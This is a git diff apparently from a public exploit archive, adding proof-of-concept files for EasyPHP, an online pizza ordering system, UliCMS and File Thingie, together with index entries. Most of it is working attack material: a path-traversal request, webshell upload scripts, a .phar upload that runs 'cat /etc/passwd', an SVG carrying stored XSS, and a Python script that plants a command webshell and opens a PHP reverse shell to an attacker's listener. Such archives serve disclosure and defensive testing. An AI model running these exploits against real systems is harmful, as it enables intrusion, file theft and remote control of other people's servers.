+Vulnerability description: An issue was discovered in EasyPHP Webserver
+14.1. An Absolute Path Traversal vulnerability in / allows remote users to
+bypass intended SecurityManager restrictions and download any file if you
+have adequate permissions outside the documentroot configured on the server.
+
+Proof of concept:
+
+GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
+HTTP/1.1
+Host: 192.168.X.X:10000
+Connection: Keep-alive
+Accept-Encoding: gzip,deflate
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
+like Gecko) Chrome/41.0.2228.0 Safari/537.21
+Accept: */*
+
+HTTP/1.1 200 OK
+Host: 192.168.X.X:10000
+Connection: close
+Content-Type: application/octet-stream
+Content-Length: 499
+
+; for 16-bit app support [fonts] [extensions] [mci extensions] [files]
+[Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1
+MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo
+3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo
+adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo
+m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo
+mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo
\ No newline at end of file
diff --git a/exploits/php/webapps/51431.py b/exploits/php/webapps/51431.py
new file mode 100755
index 000000000..ed5313b22
--- /dev/null
+++ b/exploits/php/webapps/51431.py
@@ -0,0 +1,74 @@
+# Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload
+# Date: 03/05/2023
+# Exploit Author: URGAN
+# Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip
+# Version: v1.0
+# Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23
+# CVE: CVE-2023-2246
+
+#!/usr/bin/env python3
+# coding: utf-8
+
+import os
+import requests
+import argparse
+from bs4 import BeautifulSoup
+
+# command line arguments
+parser = argparse.ArgumentParser()
+parser.add_argument('-u', '--url', type=str, help='URL with http://')
+parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
+args = parser.parse_args()
+
+# if no arguments are passed, ask the user for them
+if not (args.url and args.payload):
+    args.url = input('Enter URL with http://: ')
+    args.payload = input('Enter file path PHP webshell: ')
+
+# URL Variables
+url = args.url + '/admin/ajax.php?action=save_settings'
+img_url = args.url + '/assets/img/'
+
+filename = os.path.basename(args.payload)
+
+files = [
+  ('img',(filename,open(args.payload,'rb'),'application/octet-stream'))
+]
+
+# send a POST request to the server
+resp_upl = requests.post(url, files = files)
+status_code = resp_upl.status_code
+if status_code == 200:
+    print('[+] File uploaded')
+else:
+    print(f'[-] Error {status_code}: {resp_upl.text}')
+    raise SystemExit(f'[-] Script stopped due to error {status_code}.')
+
+# send a GET request to the server
+resp_find = requests.get(img_url)
+
+# Use BeautifulSoup to parse the page's HTML code
+soup = BeautifulSoup(resp_find.text, 'html.parser')
+
+# get all <a> tags on a page
+links = soup.find_all('a')
+
+# list to store found files
+found_files = []
+
+# we go through all the links and look for the desired file by its name
+for link in links:
+    file_upl = link.get('href')
+    if file_upl.endswith(filename): # uploaded file name
+        print('[+] Uploaded file found:', file_upl)
+        file_url = img_url + file_upl # get the full URL of your file
+        found_files.append(file_url) # add the file to the list of found files
+
+# if the list is not empty, then display all found files
+if found_files:
+    print('[+] Full URL of your file:')
+    for file_url in found_files:
+        print('[+] ' + file_url)
+else:
+    print('[-] File not found')
\ No newline at end of file
diff --git a/exploits/php/webapps/51434.txt b/exploits/php/webapps/51434.txt
new file mode 100644
index 000000000..268ea9dd1
--- /dev/null
+++ b/exploits/php/webapps/51434.txt
@@ -0,0 +1,151 @@
+#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)
+#Application: Ulicms
+#Version: 2023.1-sniffing-vicuna
+#Bugs:  RCE
+#Technology: PHP
+#Vendor URL: https://en.ulicms.de/
+#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
+#Date of found: 04-05-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+2. Technical Details & POC
+========================================
+steps:
+
+1. Login to account and edit profile.
+
+2.Upload new Avatar
+
+3. It is possible to include the php file with the phar extension when uploading the image. Rce is triggered when we visit it again. File upload error may occur, but this does not mean that the file is not uploaded and the file location is shown in the error
+
+payload: <?php echo system("cat /etc/passwd"); ?>
+
+poc request :
+
+POST /dist/admin/index.php HTTP/1.1
+Host: localhost
+Content-Length: 1982
+Cache-Control: max-age=0
+sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
+sec-ch-ua-mobile: ?0
+sec-ch-ua-platform: "Linux"
+Upgrade-Insecure-Requests: 1
+Origin: http://localhost
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYB7QS1BMMo1CXZVy
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://localhost/dist/admin/index.php?action=admin_edit&id=12&ref=home
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv
+Connection: close
+
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="csrf_token"
+
+e2d428bc0585c06c651ca8b51b72fa58
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="sClass"
+
+UserController
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="sMethod"
+
+update
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="avatar"; filename="salam.phar"
+Content-Type: application/octet-stream
+
+<?php echo system("cat /etc/passwd"); ?>
+
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="edit_admin"
+
+edit_admin
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="id"
+
+12
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="firstname"
+
+account1
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="lastname"
+
+account1
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="email"
+
+account1@test.com
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="password"
+
+
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="password_repeat"
+
+
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="group_id"
+
+1
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="secondary_groups[]"
+
+1
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="homepage"
+
+
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="html_editor"
+
+ckeditor
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="admin"
+
+1
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="default_language"
+
+
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy
+Content-Disposition: form-data; name="about_me"
+
+
+------WebKitFormBoundaryYB7QS1BMMo1CXZVy--
+
+
+
+response:
+
+Error
+GmagickException: No decode delegate for this image format (/var/www/html/dist/content/tmp/645364e62615b.phar) in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:67
+Stack trace:
+#0 /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php(67): Gmagick->__construct()
+#1 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()
+#2 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()
+#3 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()
+#4 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()
+#5 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()
+#6 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()
+#7 {main}
+
+Next Imagine\Exception\RuntimeException: Unable to open image /var/www/html/dist/content/tmp/645364e62615b.phar in /var/www/html/dist/vendor/imagine/imagine/src/Gmagick/Imagine.php:73
+Stack trace:
+#0 /var/www/html/dist/App/non_namespaced/User.php(1110): Imagine\Gmagick\Imagine->open()
+#1 /var/www/html/dist/App/non_namespaced/User.php(1089): User->processAvatar()
+#2 /var/www/html/dist/content/modules/core_users/controllers/UserController.php(124): User->changeAvatar()
+#3 /var/www/html/dist/App/non_namespaced/Controller.php(82): UserController->updatePost()
+#4 /var/www/html/dist/App/non_namespaced/ControllerRegistry.php(67): Controller->runCommand()
+#5 /var/www/html/dist/admin/index.php(66): ControllerRegistry::runMethods()
+#6 {main}
+
+
+4. Go to /var/www/html/dist/content/tmp/645364e62615b.phar (http://localhost/dist/content/tmp/645364e62615b.phar)
\ No newline at end of file
diff --git a/exploits/php/webapps/51435.txt b/exploits/php/webapps/51435.txt
new file mode 100644
index 000000000..816fb7a7b
--- /dev/null
+++ b/exploits/php/webapps/51435.txt
@@ -0,0 +1,75 @@
+#Exploit Title: Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS)
+#Application: Ulicms
+#Version: 2023.1-sniffing-vicuna
+#Bugs:  Stored Xss
+#Technology: PHP
+#Vendor URL: https://en.ulicms.de/
+#Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
+#Date of found: 04-05-2023
+#Author: Mirabbas Ağalarov
+#Tested on: Linux
+
+2. Technical Details & POC
+========================================
+steps:
+
+1. Go to media then to file (http://localhost/dist/admin/index.php?action=files)
+2. upload malicious svg file
+
+svg file content ===>
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.location);
+   </script>
+</svg>
+
+
+poc request:
+
+POST /dist/admin/fm/upload.php HTTP/1.1
+Host: localhost
+Content-Length: 663
+sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
+Accept: application/json, text/javascript, */*; q=0.01
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryK3CvcSs8xZwzABCl
+X-Requested-With: XMLHttpRequest
+sec-ch-ua-mobile: ?0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
+sec-ch-ua-platform: "Linux"
+Origin: http://localhost
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://localhost/dist/admin/fm/dialog.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: last_position=%2F; 64534366316f0_SESSION=g9vdeh7uafdagkn6l8jdk2delv
+Connection: close
+
+------WebKitFormBoundaryK3CvcSs8xZwzABCl
+Content-Disposition: form-data; name="fldr"
+
+
+------WebKitFormBoundaryK3CvcSs8xZwzABCl
+Content-Disposition: form-data; name="files[]"; filename="SVG_XSS.svg"
+Content-Type: image/svg+xml
+
+<?xml version="1.0" standalone="no"?>
+<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
+
+<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
+   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
+   <script type="text/javascript">
+      alert(document.location);
+   </script>
+</svg>
+------WebKitFormBoundaryK3CvcSs8xZwzABCl--
+
+
+
+3. Go to http://localhost/dist/content/SVG_XSS.svg
\ No newline at end of file
diff --git a/exploits/php/webapps/51436.py b/exploits/php/webapps/51436.py
new file mode 100755
index 000000000..fbd61ba50
--- /dev/null
+++ b/exploits/php/webapps/51436.py
@@ -0,0 +1,189 @@
+#!/usr/bin/python
+
+# Exploit Title: File Thingie 2.5.7 - Remote Code Execution (RCE)
+# Google Dork: N/A
+# Date: 27th of April, 2023
+# Exploit Author: Maurice Fielenbach (grimlockx) - Hexastrike Cybersecurity UG (haftungsbeschränkt)
+# Software Link: https://github.com/leefish/filethingie
+# Version: 2.5.7
+# Tested on: N/A
+# CVE: N/A
+
+# Vulnerability originally discovered / published by Cakes
+# Reference: https://www.exploit-db.com/exploits/47349
+# Run a local listener on your machine and youre good to go
+
+
+import os
+import argparse
+import requests
+import random
+import string
+import zipfile
+from urllib.parse import urlsplit, urlunsplit, quote
+
+
+class Exploit:
+    def __init__(self, target, username, password, lhost, lport):
+        self.target = target
+        self.username = username
+        self.password = password
+        self.lhost = lhost
+        self.lport = lport
+
+    def try_login(self) -> bool:
+        self.session = requests.Session()
+
+        post_body = {"ft_user": f"{self.username}", "ft_pass": f"{self.password}", "act": "dologin"}
+        response = self.session.post(self.target, data=post_body)
+
+        if response.status_code == 404:
+            print(f"[-] 404 Not Found - The requested resource {self.target} was not found")
+            return False
+
+        elif response.status_code == 200:
+
+            if "Invalid username or password" in response.text:
+                print(f"Invalid username or password")
+                return False
+
+            return True
+
+    def create_new_folder(self) -> bool:
+        # Generate random string
+        letters = string.ascii_letters
+        self.payload_filename = "".join(random.choice(letters) for i in range(16))
+        headers = {"Content-Type": "application/x-www-form-urlencoded"}
+        post_body = {f"type": "folder", "newdir": f"{self.payload_filename}", "act": "createdir", "dir": "", "submit" :"Ok"}
+
+        print(f"[*] Creating new folder /{self.payload_filename}")
+        response = self.session.post(self.target, headers=headers, data=post_body)
+
+        if f"index.php?dir=/{self.payload_filename}" in response.text:
+            print(f"[+] Created new folder /{self.payload_filename}")
+            return True
+
+        else:
+            print(f"[-] Could not create new folder /{self.payload_filename}")
+            return False
+
+    def create_payload(self) -> bool:
+        try:
+            with zipfile.ZipFile(f"{self.payload_filename}.zip", 'w', compression=zipfile.ZIP_DEFLATED) as zip_file:
+                    zip_file.writestr(f"{self.payload_filename}.php", "<?php if(isset($_REQUEST[\'cmd\'])){ echo \"<pre>\"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo \"</pre>\"; die; }?>")
+                    print(f"[+] Zipped payload to {self.payload_filename}.zip")
+                    return True
+        except:
+            print(f"[-] Could not create payload to {self.payload_filename}.zip")
+            return False
+
+    def upload_payload(self) -> bool:
+        # Set up the HTTP headers and data for the request
+        headers = {
+            b'Content-Type': b'multipart/form-data; boundary=---------------------------grimlockx'
+        }
+
+        post_body = (
+            '-----------------------------grimlockx\r\n'
+            'Content-Disposition: form-data; name="localfile-1682513975953"; filename=""\r\n'
+            'Content-Type: application/octet-stream\r\n\r\n'
+        )
+
+        post_body += (
+            '\r\n-----------------------------grimlockx\r\n'
+            'Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n\r\n'
+            '2000000\r\n'
+            '-----------------------------grimlockx\r\n'
+            f'Content-Disposition: form-data; name="localfile"; filename="{self.payload_filename}.zip"\r\n'
+            'Content-Type: application/zip\r\n\r\n'
+        )
+
+        # Read the zip file contents and append them to the data
+        with open(f"{self.payload_filename}.zip", "rb") as f:
+            post_body += ''.join(map(chr, f.read()))
+
+        post_body += (
+            '\r\n-----------------------------grimlockx\r\n'
+            'Content-Disposition: form-data; name="act"\r\n\r\n'
+            'upload\r\n'
+            '-----------------------------grimlockx\r\n'
+            'Content-Disposition: form-data; name="dir"\r\n\r\n'
+            f'/{self.payload_filename}\r\n'
+            '-----------------------------grimlockx\r\n'
+            'Content-Disposition: form-data; name="submit"\r\n\r\n'
+            'Upload\r\n'
+            '-----------------------------grimlockx--\r\n'
+        )
+
+        print("[*] Uploading payload to the target")
+
+        response = self.session.post(self.target, headers=headers, data=post_body)
+
+        if f"<a href=\"./{self.payload_filename}/{self.payload_filename}.zip\" title=\"Show {self.payload_filename}.zip\">{self.payload_filename}.zip</a>" in response.text:
+            print("[+] Uploading payload successful")
+            return True
+
+        else:
+            print("[-] Uploading payload failed")
+            return False
+
+    def get_base_url(self) -> str:
+        url_parts = urlsplit(self.target)
+        path_parts = url_parts.path.split('/')
+        path_parts.pop()
+        base_url = urlunsplit((url_parts.scheme, url_parts.netloc, '/'.join(path_parts), "", ""))
+        return base_url
+
+    def unzip_payload(self) -> bool:
+        print("[*] Unzipping payload")
+        headers = {"Content-Type": "application/x-www-form-urlencoded"}
+        post_body = {"newvalue": f"{self.payload_filename}.zip", "file": f"{self.payload_filename}.zip", "dir": f"/{self.payload_filename}", "act": "unzip"}
+        response = self.session.post(f"{self.target}", headers=headers, data=post_body)
+
+        if f"<p class='ok'>{self.payload_filename}.zip unzipped.</p>" in response.text:
+            print("[+] Unzipping payload successful")
+            print(f"[+] You can now execute commands by opening {self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd=<command>")
+            return True
+
+        else:
+            print("[-] Unzipping payload failed")
+            return False
+
+    def execute_payload(self) -> bool:
+        print("[*] Trying the get a reverse shell")
+
+        cmd = quote(f"php -r \'$sock=fsockopen(\"{self.lhost}\",{self.lport});system(\"/bin/bash <&3 >&3 2>&3\");\'")
+        print("[*] Executing payload")
+
+        response = self.session.get(f"{self.get_base_url()}/{self.payload_filename}/{self.payload_filename}.php?cmd={cmd}")
+        print("[+] Exploit complete")
+
+        return True
+
+    def cleanup_local_files(self) -> bool:
+        if os.path.exists(f"{self.payload_filename}.zip"):
+            os.remove(f"{self.payload_filename}.zip")
+            print("[+] Cleaned up zipped payload on local machine")
+            return True
+
+        print("[-] Could not clean up zipped payload on local machine")
+        return False
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser()
+    parser.add_argument("-t", "--target", dest="target", type=str, required=True, help="Target URL to ft2.php")
+    parser.add_argument("-u", "--username", dest="username", type=str, required=True, help="FileThingie username")
+    parser.add_argument("-p", "--password", dest="password", type=str, required=True, help="FileThingie password")
+    parser.add_argument("-L", "--LHOST", dest="lhost", type=str, required=True, help="Local listener ip")
+    parser.add_argument("-P", "-LPORT", dest="lport", type=int, required=True, help="Local listener port")
+    args = parser.parse_args()
+
+    exploit = Exploit(args.target, args.username, args.password, args.lhost, args.lport)
+    exploit.try_login()
+    exploit.create_new_folder()
+    exploit.create_payload()
+    exploit.upload_payload()
+    exploit.unzip_payload()
+    exploit.execute_payload()
+    exploit.cleanup_local_files()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 49cd5f147..4e3c14b85 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10292,6 +10292,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49195,exploits/multiple/local/49195.js,"Chromium 83 - Full CSP Bypass",2020-12-04,"Gal Weizman",local,multiple,,2020-12-04,2020-12-04,0,CVE-2020-6519,,,,,
 19821,exploits/multiple/local/19821.c,"Citrix Metaframe 1.0/1.8 - Weak Encryption",2000-03-29,"Dug Song",local,multiple,,2000-03-29,2012-07-14,1,CVE-2000-0244;OSVDB-6335,,,,,https://www.securityfocus.com/bid/1077/info
 40686,exploits/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",local,multiple,,2016-11-02,2016-11-02,0,CVE-2016-9111,,,,,
+51432,exploits/multiple/local/51432.txt,"Codigo Markdown Editor v1.0.1 (Electron) - Remote Code Execution",2023-05-05,8bitsec,local,multiple,,2023-05-05,2023-05-05,0,,,,,,
 19498,exploits/multiple/local/19498.sh,"Common Desktop Environment 2.1 20 / Solaris 7.0 - 'dtspcd' Local Privilege Escalation",1999-09-13,"Job de Haas of ITSX",local,multiple,,1999-09-13,2017-11-22,1,CVE-1999-0689;OSVDB-1072,,,,,https://www.securityfocus.com/bid/636/info
 22727,exploits/multiple/local/22727.pl,"Computer Associates - Unicenter Asset Manager Stored Secret Data Decryption",2003-03-19,kufumo.com,local,multiple,,2003-03-19,2012-11-15,1,OSVDB-3242,,,,,https://www.securityfocus.com/bid/7808/info
 48187,exploits/multiple/local/48187.txt,"Counter Strike: GO - '.bsp' Memory Control (PoC)",2020-03-09,"0day enthusiast",local,multiple,,2020-03-10,2020-03-10,0,,,,http://www.exploit-db.com/screenshots/idlt48500/1-0simwojvzjsolm4job-l5w.png,,https://medium.com/@stdio__/cs-go-0days-or-why-all-or-nothing-bug-bounty-programs-are-bad-cce144a5013
@@ -15725,6 +15726,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41303,exploits/php/webapps/41303.txt,"CLUB-8 EMS - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php,,2017-02-10,2017-02-10,0,,,,,,
 38740,exploits/php/webapps/38740.txt,"cm3 Acora CMS - 'top.aspx' Information Disclosure",2013-08-26,"Pedro Andujar",webapps,php,,2013-08-26,2015-11-17,1,CVE-2013-4727;OSVDB-96666,,,,,https://www.securityfocus.com/bid/62010/info
 2897,exploits/php/webapps/2897.txt,"CM68 News 12.02.06 - 'addpth' Remote File Inclusion",2006-12-08,"Paul Bakoyiannis",webapps,php,,2006-12-07,,1,OSVDB-32142;CVE-2006-6544;OSVDB-32141;CVE-2006-6462,,,,,
+51422,exploits/php/webapps/51422.txt,"Cmaps v8.0 - SQL injection",2023-05-05,"Lucas Noki (0xPrototype)",webapps,php,,2023-05-05,2023-05-05,0,CVE-2023-29809,,,,,
 6313,exploits/php/webapps/6313.txt,"CMME 1.12 - Local File Inclusion / Cross-Site Scripting / Cross-Site Request Forgery/Download Backup/Make Directory",2008-08-26,SirGod,webapps,php,,2008-08-25,2016-12-20,1,OSVDB-48103;CVE-2008-3926;OSVDB-48102;CVE-2008-3925;OSVDB-48101;CVE-2008-3924;OSVDB-48100;OSVDB-48099;CVE-2008-3923;OSVDB-48098,,,,,
 5905,exploits/php/webapps/5905.txt,"cmreams CMS 1.3.1.1 beta2 - Local File Inclusion / Cross-Site Scripting",2008-06-22,CraCkEr,webapps,php,,2008-06-21,2016-12-09,1,OSVDB-46868;CVE-2008-2985;OSVDB-46866;CVE-2008-2984,,,,http://www.exploit-db.comcmreams_1-3-1-1_beta-2.zip,
 12333,exploits/php/webapps/12333.txt,"cms (id) 5.0 - SQL Injection",2010-04-22,spykit,webapps,php,,2010-04-21,,0,CVE-2009-2439;OSVDB-55785,,,,,
@@ -17458,6 +17460,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38438,exploits/php/webapps/38438.txt,"EasyPHP - '/index.php' Authentication Bypass / Remote PHP Code Injection",2013-04-09,KedAns-Dz,webapps,php,,2013-04-09,2015-10-10,1,,,,,,https://www.securityfocus.com/bid/58945/info
 37023,exploits/php/webapps/37023.txt,"EasyPHP - 'main.php' SQL Injection",2012-03-29,"Skote Vahshat",webapps,php,,2012-03-29,2015-05-16,1,,,,,,https://www.securityfocus.com/bid/52781/info
 40809,exploits/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,webapps,php,,2016-11-22,2016-11-22,1,,,,,http://www.exploit-db.comEasyPHP-Devserver-16.1.1-setup.exe,
+51430,exploits/php/webapps/51430.txt,"EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and Path Traversal)",2023-05-05,"Rafael Pedrero",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
 25928,exploits/php/webapps/25928.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'calendar.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php,,2005-07-04,2013-06-04,1,CVE-2005-2155;OSVDB-17723,,,,,https://www.securityfocus.com/bid/14131/info
 25931,exploits/php/webapps/25931.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'datePicker.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php,,2005-07-04,2013-06-04,1,CVE-2005-2155;OSVDB-17733,,,,,https://www.securityfocus.com/bid/14131/info
 25930,exploits/php/webapps/25930.txt,"EasyPHPCalendar 6.1.5/6.2.x - 'header.inc.php?serverPath' Remote File Inclusion",2005-07-04,"Albania Security Clan",webapps,php,,2005-07-04,2013-06-04,1,CVE-2005-2155;OSVDB-17732,,,,,https://www.securityfocus.com/bid/14131/info
@@ -18250,6 +18253,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12763,exploits/php/webapps/12763.txt,"File Share scriptFile share - SQL Injection",2010-05-27,MouDy-Dz,webapps,php,,2010-05-26,,0,,,,,,
 6040,exploits/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injections",2008-07-11,"Nu Am Bani",webapps,php,,2008-07-10,2016-12-14,1,OSVDB-23864;CVE-2006-1278;OSVDB-23863,,,,http://www.exploit-db.comfilestore.zip,
 12617,exploits/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",webapps,php,,2010-05-15,2017-07-14,0,OSVDB-55934,,file_thingie_v255_Jeremiah.zip,,,
+51436,exploits/php/webapps/51436.py,"File Thingie 2.5.7 - Remote Code Execution (RCE)",2023-05-05,"Maurice Fielenbach (grimlockx)",webapps,php,,2023-05-05,2023-05-05,0,,,,,,
 10689,exploits/php/webapps/10689.txt,"file upload Ar Version - Arbitrary File Upload",2009-12-26,indoushka,webapps,php,,2009-12-25,,0,,,,,,
 11450,exploits/php/webapps/11450.txt,"File Upload Manager 1.3 - Web Shell File Upload",2010-02-14,ROOT_EGY,webapps,php,,2010-02-13,2017-11-15,0,,,,,,
 30467,exploits/php/webapps/30467.txt,"File Uploader 1.1 - 'datei.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,webapps,php,,2007-08-09,2013-12-24,1,CVE-2007-4327;OSVDB-36425,,,,,https://www.securityfocus.com/bid/25253/info
@@ -19899,7 +19903,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 25323,exploits/php/webapps/25323.txt,"InterAKT Online MX Shop 1.1.1 - SQL Injection",2005-03-31,Dcrab,webapps,php,,2005-03-31,2013-05-10,1,CVE-2005-0955;OSVDB-15168,,,,,https://www.securityfocus.com/bid/12957/info
 34941,exploits/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 - 'q' Cross-Site Scripting",2009-05-25,SmOk3,webapps,php,,2009-05-25,2014-10-12,1,CVE-2009-2289;OSVDB-54710,,,,,https://www.securityfocus.com/bid/44555/info
 35416,exploits/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",webapps,php,,2011-03-03,2014-12-02,1,,,,,,https://www.securityfocus.com/bid/46771/info
-51274,exploits/php/webapps/51274.txt,"Intern Record System v1.0 - SQL Injection (Unauthenticated)",2023-04-06,"Hamdi Sevben",webapps,php,,2023-04-06,2023-04-06,0,CVE-2022-40347,,,,,
+51274,exploits/php/webapps/51274.txt,"Intern Record System v1.0 - SQL Injection (Unauthenticated)",2023-04-06,"Hamdi Sevben",webapps,php,,2023-04-06,2023-05-05,1,CVE-2022-40347,,,,,
 5617,exploits/php/webapps/5617.txt,"Internet PhotoShow (Special Edition) - Insecure Cookie Handling",2008-05-14,t0pP8uZz,webapps,php,,2008-05-13,,1,OSVDB-45502;CVE-2008-2282,,,,,
 1694,exploits/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Remote File Inclusion",2006-04-18,Hessam-x,webapps,php,,2006-04-17,2016-11-29,1,OSVDB-24743;CVE-2006-1919,,,,,
 49823,exploits/php/webapps/49823.py,"Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated)",2021-05-04,argenestel,webapps,php,,2021-05-04,2021-10-29,0,,,,,,
@@ -20287,6 +20291,13 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12598,exploits/php/webapps/12598.txt,"JE Ajax Event Calendar - Local File Inclusion",2010-05-14,Valentin,webapps,php,,2010-05-13,,1,OSVDB-64704;CVE-2010-2129,,,,,
 15141,exploits/php/webapps/15141.txt,"JE CMS 1.0.0 - Authentication Bypass",2010-09-28,Abysssec,webapps,php,,2010-09-28,2010-09-28,1,,,,,,
 12641,exploits/php/webapps/12641.txt,"JE CMS 1.1 - SQL Injection",2010-05-17,AntiSecurity,webapps,php,,2010-05-16,,1,OSVDB-64716;CVE-2010-2047,,,,,
+51428,exploits/php/webapps/51428.txt,"Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls",2023-05-05,"Team Syslifters",webapps,php,,2023-05-05,2023-05-05,0,CVE-2022-47874,,,,,
